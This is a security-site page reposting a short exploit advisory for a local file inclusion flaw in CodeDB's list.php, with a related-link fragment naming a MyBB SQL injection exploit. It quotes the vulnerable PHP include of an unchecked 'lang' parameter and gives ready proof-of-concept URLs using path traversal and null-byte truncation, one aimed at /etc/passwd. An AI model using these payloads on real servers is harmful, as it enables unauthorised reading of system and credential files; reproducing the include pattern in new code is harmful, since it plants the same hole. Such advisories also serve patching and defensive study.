建站极客  
                        网络安全                          Exploit                          正文 
                     
                 
                
                    CodeDB (list.php lang) Local File Inclusion Vulnerability                 
                
                    所属分类:
                        网络安全  / Exploit                      
                    阅读数:
                        135 
                    
                        
                                 
                             收藏 0
                                 
                             赞 0
                                 
                             分享 
                    
                 
                
                    ############################################################################### 
# 
#   Name    :   CodeDB (list.php lang) Local File Inclusion Vulnerability 
#   Author  :   cOndemned 
#   Greetz  :   ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;* 
# 
############################################################################### 
 
Source : 
 
    // list.php 
     
    2.  $lang = htmlspecialchars($_GET['lang']);            // ok, but.... for what ? lol 
     
    7.  if(file_exists('templates/'.$lang.'_middle.php'))   // We'll have to cut off rest of filename & extension 
8.      include('templates/'.$lang.'_middle.php');      // Ekhm... pwned ;d 
     
     
Proof of Concept : 
 
    http://[host]/[codeDB_path]/list.php?lang=../readme.txt\0 
    http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd\0 
    http://[host]/[codeDB_path]/list.php?lang=../[local_file]\0 
 
     
EoF.  
                                     
             
            
                
                MyBulletinBoard (MyBB) <?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
                 查看更多